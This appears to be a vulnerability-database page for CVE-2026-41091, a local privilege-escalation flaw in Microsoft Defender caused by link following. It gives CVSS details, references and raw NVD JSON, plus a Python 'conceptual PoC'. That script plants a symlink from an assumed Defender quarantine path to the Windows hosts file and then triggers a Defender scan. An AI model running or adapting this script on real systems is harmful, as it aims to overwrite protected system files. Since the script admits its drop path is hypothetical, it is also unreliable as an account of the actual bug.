CVE-2026-41091

Description

Improper link resolution before file access ('link following') in Microsoft Defender allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Microsoft Defender (未披露具体版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# This is a conceptual PoC for CVE-2026-41091
# It demonstrates how an attacker might create a symlink to exploit the vulnerability.

import os
import subprocess

# Target system file to overwrite (e.g., a system config or DLL)
target_file = r"C:\Windows\System32\drivers\etc\hosts"
# Path that Microsoft Defender is expected to write to (hypothetical)
defender_drop_path = r"C:\Temp\DefenderQuarantine\malicious_file.tmp"

print(f"[*] Creating symlink from {defender_drop_path} to {target_file}")

# Create a directory junction or symlink (requires Developer Mode or Admin rights usually,
# but specific exploit scenarios might leverage existing permissions)
try:
    os.remove(defender_drop_path) if os.path.exists(defender_drop_path) else None
    os.symlink(target_file, defender_drop_path)
    print("[+] Symlink created successfully.")
except Exception as e:
    print(f"[-] Failed to create symlink: {e}")
    exit(1)

# Trigger Microsoft Defender to scan the path
print("[*] Triggering Microsoft Defender scan on the symlinked path...")
subprocess.run(["powershell", "-Command", f"Start-MpScan -ScanPath {defender_drop_path} -ScanType CustomScan"])

print("[*] Waiting for Defender to process the file...")
print("[*] If exploited, Defender may have written data to the target file.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41091
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41091
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41091/
[4] VulDB https://vuldb.com/cve/CVE-2026-41091
[5] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41091
[6] https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-41091

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41091", "sourceIdentifier": "[email protected]", "published": "2026-05-20T13:16:29.173", "lastModified": "2026-05-20T18:16:27.213", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper link resolution before file access ('link following') in Microsoft Defender allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41091", "source": "[email protected]"}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-41091", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}